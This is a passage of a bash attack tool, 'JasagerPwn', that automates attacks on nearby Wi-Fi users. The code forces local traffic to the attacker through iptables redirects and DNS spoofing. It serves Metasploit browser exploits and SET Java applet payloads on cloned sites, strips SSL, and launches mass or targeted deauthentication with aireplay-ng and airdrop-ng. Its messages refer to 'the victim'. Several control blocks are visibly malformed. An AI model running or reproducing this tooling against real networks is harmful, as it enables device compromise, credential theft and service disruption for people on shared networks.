xterm -geometry 75x5+0+94 -bg black -fg green -T "[JasagerPwn-Apache Kill] v$version - Stopping Apache2" -e "/etc/init.d/apache2 stop" &

xterm -geometry 110x42+464-38 -bg black -fg green -T "[Metasploit Handler] v$version" -e "msfconsole -r /tmp/msfrcBP" &

sleep 30 #Wait for browserAutopwn to start up modules and web server

echo -e "\e[01;33m[!]\e[00m Forcing LAN to visit our site..."

ipTableRedirect

xterm -geometry 75x7+0-36 -bg black -fg green -T "[JasagerPwn-DNS Spoof] v$version" -e "dnsspoof -i $FONIFACE -f /tmp/jasagerpwn.dns" &

echo -e "\e[01;33m[!]\e[00m Starting Web Server browserPwn attack @ $fonIP:80..."

browserpwn="1"

while true

if [ $fakeupdate -eq 1 ]; then break; fi

if [ $javaATK -eq 1 ]; then break; fi

echo

echo -e "\e[01;33m[MODE][============-BrowserPwn Metasploit-==========][!]\e[00m"

echo -e -n "\e[01;33m[!]\e[00m [S][1] to Stop Attack or [M][2] for Main Menu: "

read -e USR_CHOICE2

#read -r -p "[?] Enter [I] to give Internet back or [M] for Main Menu: " USR_CHOICE2

case $USR_CHOICE2 in

S|s|Stop|stop|1)

xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE"

xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --jump REDIRECT"

xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $fonIP"

IPTABLES

xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-DNS Kill] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof" &

xterm -geometry 75x5+0+94 -bg black -fg green -T "[JasagerPwn-Apache Kill] v$version - Stopping Apache2" -e "/etc/init.d/apache2 stop" &

browserpwn="0"

sleep 2

if [ $wasSniffing != "0" ]; then sslstrip ; fi

echo -e "\e[01;33m[!]\e[00m Kill Metasploit Server Jobs if you use FakeUpdate!!"

echo -e "\e[01;33m[!]\e[00m Dont Forget To Run 'ipconfig /flushdns' On Victim!!"

break

;;

M|m|Menu|menu|2)

break

;;

*) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.."

esac

done

;;

J|j|java|Java|4)

SETcheck=`ps aux | grep "python ./set-automate" | grep -v grep | awk '{ print $2 }'`

if [ $browserpwn -eq 1 ]; then

echo -e "\e[01;31m[!]\e[00m Error: Cant run with browserPwn. Port Conflict."

elif [ $fakeupdate -eq 1 ]; then

echo -e "\e[01;31m[!]\e[00m Error: Cant run with FakeUpdate. Port Conflict."

elif [ $SETcheck ] && [ $javaATK -eq 0 ]; then

echo -e "\e[01;31m[!]\e[00m Error: You still have a SET window open.. Close it first or this will cause problems.."

elif [ $javaATK -eq 0 ] && [ ! $SETcheck ]; then

echo -n -e "\e[01;33m[!]\e[00m [1][G]oogle or [2][J]ava Required: "

read -e JavaSite

case $JavaSite in

G|g|Google|google|1)

if [ $autoMetScript -eq 1 ]; then metScript; fi

javasite="1"

JavaSite

xterm -geometry 75x8+100+0 -fg green -bg black -T "v$version - Starting Apache2" -e "/etc/init.d/apache2 restart"

service apache2 restart > /dev/null

sleep .5

xterm -geometry 75x8+100+0 -fg green -bg black -T "v$version - Starting Apache2" -e "ls /etc/apache2/sites-available/ | xargs a2dissite && a2ensite google && /etc/init.d/apache2 reload"

sleep .5

xterm -fg green -bg black -geometry 110x42+464-38 -T "[SET-JavaApplet] v$version - WebServer" -e "cd $SETpath && ./set-automate /tmp/auto-google2" &

;;

J|j|Java|java|2)

if [ $autoMetScript -eq 1 ]; then metScript; fi

javasite="2" && sleep 1

JavaSite

xterm -geometry 75x8+100+0 -bg black -fg green -T "v$version - Starting Apache2" -e "/etc/init.d/apache2 restart"

service apache2 restart > /dev/null

sleep .5

xterm -geometry 75x8+100+0 -bg black -fg green -T "v$version - Starting Apache2" -e "ls /etc/apache2/sites-available/ | xargs a2dissite && a2ensite javapwn && /etc/init.d/apache2 reload"

sleep .5

xterm -fg green -bg black -geometry 110x42+464-38 -T "[SET-JavaApplet] v$version - WebServer" -e "cd $SETpath && ./set-automate /tmp/auto-java2" &

;;

*) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.."

esac

sleep 4

echo -n -e "\e[01;34m[*]\e[00m Press [ENTER] when SET is ready.."

read -e $blahblahblahnotused

echo -e "\e[01;33m[!]\e[00m Forcing LAN to visit our site..."

ipTableRedirect

if [ $autoMetScript -eq 1 ]; then metScript; fi

if [ -e "$SETpath/src/web_clone/site/template/index2.html" ] && [ ! -e "$SETpath/src/web_clone/site/template/index.html" ]; then

mv "$SETpath/src/web_clone/site/template/index2.html" "$SETpath/src/web_clone/site/template/index.html"

if [ -e "/var/www/javapwn/index2.html" ] && [ ! -e "/var/www/javapwn/index.html" ]; then

mv "/var/www/javapwn/index2.html" "/var/www/javapwn/index.html"

if [ -e "/var/www/javapwn/index1.html" ] && [ ! -e "/var/www/javapwn/index.html" ]; then

mv "/var/www/javapwn/index1.html" "/var/www/javapwn/index.html"

xterm -geometry 75x7+0-36 -bg black -fg green -T "[JasagerPwn-Kill DNS] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof"

xterm -geometry 75x7+0-36 -bg black -fg green -T "[JasagerPwn-DNS Spoof] v$version - DNSSpoof" -e "dnsspoof -i $FONIFACE -f /tmp/jasagerpwn.dns" &

javaATK="1"

while true

if [ $SETcheck ] && [ $javaATK -eq 0 ]; then break; fi

if [ $browserpwn -eq 1 ]; then break; fi

if [ $fakeupdate -eq 1 ]; then break; fi

echo

echo -e "\e[01;33m[MODE][==========-Java Applet Attack SET-==========][!]\e[00m"

echo -e -n "\e[01;33m[!]\e[00m [S][1] to Stop Attack or [M][2] for Main Menu: "

read -e USR_CHOICE9

#read -r -p "[?] Enter [I] to give Internet back or [M] for Main Menu: " USR_CHOICE9

case $USR_CHOICE9 in

S|s|Stop|stop|1)

xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE"

xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --jump REDIRECT"

xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $fonIP"

IPTABLES

xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-DNS Kill] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof" &

xterm -geometry 75x5+0+94 -bg black -fg green -T "[JasagerPwn-Apache Kill] v$version - Stopping Apache2" -e "/etc/init.d/apache2 stop" &

javaATK="0"

sleep 3

if [ $wasSniffing != "0" ]; then sslstrip ; fi

echo -e "\e[01;33m[!]\e[00m DONT FORGET TO RUN 'ipconfig /flushdns' ON VICTIM!!"

break

;;

M|m|Menu|menu|2)

break

;;

*) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.."

esac

done

;;

D|d|deauth|Deauth|DeAuth|5)

attackCheck=`ifconfig | grep $MIFACE | awk '{print $1}' | cut -b 4`

while true

echo

echo -e "\e[01;33m[MODE][======================-DeAuth Attacks-=========================][!]\e[00m"

echo -e "\e[01;33m[!]\e[00m [1][A]irodrop-ng [2][D]eAuth Mass [3][S]ingle DeAuth"

echo -e "\e[01;33m[!]\e[00m [4][K]ill DeAuth [5][M]ain menu"

#read -r -p "[?] Please enter [ A | D | S | K | M ]: " USR_CHOICE3

echo -e -n "\e[01;33m[!]\e[00m Choose From Above: "

read -e USR_CHOICE3

case $USR_CHOICE3 in

A|a|airodrop|Airodrop|1)

if [ -e "/usr/bin/airdrop-ng" ]; then

if [ -e "/tmp/cap-01.csv" ]; then rm /tmp/cap-* ; fi

sleep 2

xterm -geometry 90x30+464+0 -bg black -fg green -T "[JasagerPwn-Airodump] Capturing APs" -e "airodump-ng -w /tmp/cap -o csv $MIFACE" &

AIRDUMPID=`echo $!`

sleep 10

xterm -geometry 75x12+464+418 -bg black -fg green -hold -T "[JasagerPwn-Airdrop Attack] v$version" -e "airdrop-ng -b -i $MIFACE -r /tmp/deauth.conf -t /tmp/cap-01.csv" &

AIRDROPID=`echo $!`

else

echo

echo -e "\e[01;31m[!]\e[00m Error: You need to fully install airdrop-ng for this."

echo -e "\e[01;31m[!]\e[00m Please go to /pentest/wireless/aircrack-ng/scripts/airdrop-ng and run install.py."

;;

D|d|deauth|DeAuth|2)

xterm -geometry 75x12+464+265 -bg black -fg green -T "[JasagerPwn-MassDeauth.sh] v$version" -e "chmod +x src/deauth.sh && bash src/deauth.sh" &

DEAUTHPID=`echo $!`

;;

S|s|single|Single|3)

xterm -geometry 75x12+464+288 -bg black -fg green -T "[JasagerPwn-DeAuth Kill] v$version" -e "killall -9 aireplay" &

xterm -geometry 95x47+577+0 -hold -bg black -fg green -T "[CLOSE MANUALLY] - Airodump Capture" -e "airodump-ng $MIFACE" &

airID=`echo $!`

echo

read -r -p "[?] Enter the target APs BSSID: " TBSSID

kill $airID

read -r -p "[?] Do You want a specific client? [ Y | N ]: " DMODE

case $DMODE in

y|Y|Yes|yes|1)

xterm -geometry 95x47+577+0 -hold -bg black -fg green -T "[CLOSE MANUALLY] - Airodump Capture" -e "airodump-ng --bssid $TBSSID $MIFACE" &

echo

read -r -p "[?] Enter the target Client MAC: " CMAC

xterm -geometry 75x12+464+265 -bg black -fg green -T "[JasagerPwn-Manual DeAuth] v$version" -e "aireplay-ng -D -0 20 -a $TBSSID -c $CMAC $MIFACE" &

;;

n|N|No|no|2)

xterm -geometry 75x12+464+265 -bg black -fg green -T "[JasagerPwn-Manual DeAuth] v$version" -e "aireplay-ng -0 20 -D -a $TBSSID $MIFACE" &

;;

*) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.."

esac

;;

K|k|kill|Kill|4)

xterm -geometry 75x12+464+288 -bg black -fg green -T "[JasagerPwn-DeAuth Kill] v$version" -e "kill $DEAUTHPID && killall -9 aireplay-ng && killall airodump-ng && kill $AIRDROPID && kill $AIRDUMPID" &

xterm -geometry 75x12+464+288 -bg black -fg green -T "[JasagerPwn-DeAuth Kill] v$version" -e "kill $AIRDROPID && kill $AIRDUMPID && kill $airID" &

;;

M|m|menu|Menu|5)

break

;;

*) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.."

esac

done

;;

N|n|Network|network|net|6)

while true

echo

echo -e "\e[01;33m[MODE][=======================-Script Settings-=======================][!]\e[00m"

echo -e "\e[01;33m[!]\e[00m [1][I]nterface [2]DeAuth [C]onfig "

echo -e "\e[01;33m[!]\e[00m [3][R]efresh I-net [4][M]ain Menu"

echo -e -n "\e[01;33m[!]\e[00m Choose From Above: "

read -e USR_CHOICE99

case $USR_CHOICE99 in

I|i|interface|Interface|1)

read -r -p "[?] Using a WiFi Network (Adds DeAuth Rule) [ Y | N ]: " USR_CHOICE98

case $USR_CHOICE98 in

y|Y|Yes|yes|1)

resolvIDs=`ps aux | grep "bash /tmp/resolv" | grep -v grep | awk '{ print $2 }'`

xterm -geometry 75x12+464+288 -bg black -fg green -T "[ResolvLoop Kill] v$version" -e "killall -9 $dnsID2"

echo

read -p "[!] Connect to WiFi Network THEN Press [Enter] .."

echo

echo -e "\e[01;33m[!]\e[00m Current Gateway Interface = $IFACE"

read -r -p "[?] Please Enter the New Gateway Interface: " NEWIFACE

IFACE=`echo $NEWIFACE`

if [ $sniffing -eq 0 ] && [ $browserpwn -eq 0 ] && [ $fakeupdate -eq 0 ] && [ $javaATK -eq 0 ]; then

IPTABLES

elif [ $sniffing -eq 1 ] || [ $browserpwn -eq 1 ] || [ $fakeupdate -eq 1 ] || [ $javaATK -eq 1 ]; then

ipTableRedirect

echo "while true ; do echo "nameserver 4.2.2.2" > /etc/resolv.conf && sleep 30 ; done &" > /tmp/resolv.sh

chmod +x /tmp/resolv.sh

bash /tmp/resolv.sh &

wifiMAC=`ifconfig $IFACE | grep "HWaddr" | awk '{print $5}' | tr "[a-z]" "[A-Z]"`

newIFACEmac=`iwconfig $IFACE | grep "Access Point" | awk '{print $6}'`

echo "a/$newIFACEmac|$wifiMAC" >> /tmp/deauth.conf

;;

n|N|No|no|2)

resolvIDs=`ps aux | grep "bash /tmp/resolv" | grep -v grep | awk '{ print $2 }'`

xterm -geometry 75x12+464+288 -bg black -fg green -T "[ResolvLoop Kill] v$version" -e "killall $dnsID2"

echo

echo -e "\e[01;33m[!]\e[00m Current Gateway Interface = $IFACE"

read -r -p "[?] Please Enter the New Gateway Interface: " NEWIFACE

IFACE=`echo $NEWIFACE`

if [ $sniffing -eq 0 ] && [ $browserpwn -eq 0 ] && [ $fakeupdate -eq 0 ] && [ $javaATK -eq 0 ]; then

IPTABLES

elif [ $sniffing -eq 1 ] || [ $browserpwn -eq 1 ] || [ $fakeupdate -eq 1 ] || [ $javaATK -eq 1 ]; then

ipTableRedirect

echo "while true ; do echo "nameserver 4.2.2.2" > /etc/resolv.conf && sleep 30 ; done &" > /tmp/resolv.sh

chmod +x /tmp/resolv.sh

bash /tmp/resolv.sh &

dnsID2=`echo $!`

;;

*) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.."

esac

;;

xterm -geometry 95x47+577+0 -bg black -fg green -T "[EDITING] Airdrop DeAuth Config" -e "nano /tmp/deauth.conf"

echo

echo -e "\e[01;33m[!]\e[00m Go To DeAuth Menu, Kill it, and Restart Airdrop-ng to apply changes."

;;

R|r|refresh|Refresh|3)

xterm -geometry 75x12+464+288 -bg black -fg green -T "[JasagerPwn-DeAuth Kill] v$version" -e "ifconfig $IFACE up && dhclient $IFACE"

sleep 3

gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'`

resolvIDs=`ps aux | grep "bash /tmp/resolv" | grep -v grep | awk '{ print $2 }'`

xterm -geometry 75x12+464+288 -bg black -fg green -T "[ResolvLoop Kill] v$version" -e "killall $dnsID2" &

#while true ; do echo "nameserver 4.2.2.2" > /etc/resolv.conf && sleep 30 ; done &> /dev/null &

echo "while true ; do echo "nameserver 4.2.2.2" > /etc/resolv.conf && sleep 30 ; done &" > /tmp/resolv.sh

chmod +x /tmp/resolv.sh

bash /tmp/resolv.sh &

dnsID2=`echo $!`

;;

M|m|menu|Menu|4)

break

;;

*) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.."

esac

done

;;

X|x|exit|Exit|7)

cleanup

;;

*) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.."

esac

done

cleanup

#bash #jasagerpgn #attackvector #scripting #linux #backtrack #java #set #ssl